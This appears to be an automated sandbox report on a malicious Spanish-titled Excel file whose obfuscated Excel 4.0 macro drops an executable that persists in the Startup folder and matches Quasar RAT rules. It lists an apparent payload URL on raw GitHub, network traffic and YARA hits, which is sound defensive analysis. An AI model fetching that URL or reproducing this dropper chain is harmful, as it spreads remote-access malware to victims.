Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk
Source: a.exe, 00000001.00000002.709635511.00000000027D3000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.772094694.00000000028B3000.00000004.00000001.sdmp, a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com4
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://tasks.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/watch?v=Qxk6cu21JSg

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: a.exe, 00000001.00000002.708928788.0000000000AFB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

Initial sample: EXEC

Found obfuscated Excel 4.0 Macro

Show sources

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

Initial sample: High usage of CHAR() function: 23

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\a.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe			Jump to dropped file

Source: C:\ProgramData\a.exe	Code function: 1_2_00E6C154
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6E597
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6E598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 11_2_00FAC154
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 11_2_00FAE598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 11_2_00FAE589
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD579D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD0740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD16A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD16FC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD16E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD17B2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD178B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD0730
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD172C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD170F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD1773
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD175A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD1741
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD04D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD04C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD3F7D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_054121F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_054152E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_05411928
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0541A710
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0541A6FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_054115E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0690BFD6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06907994
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06E04F4F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06E03F58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06E01B88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BDD250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 17_2_028DC154
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 17_2_028DE589
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 17_2_028DE598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_01560740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_0156579D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_015604D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_015604C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_01560730

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

OLE indicator, VBA macros: true

Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
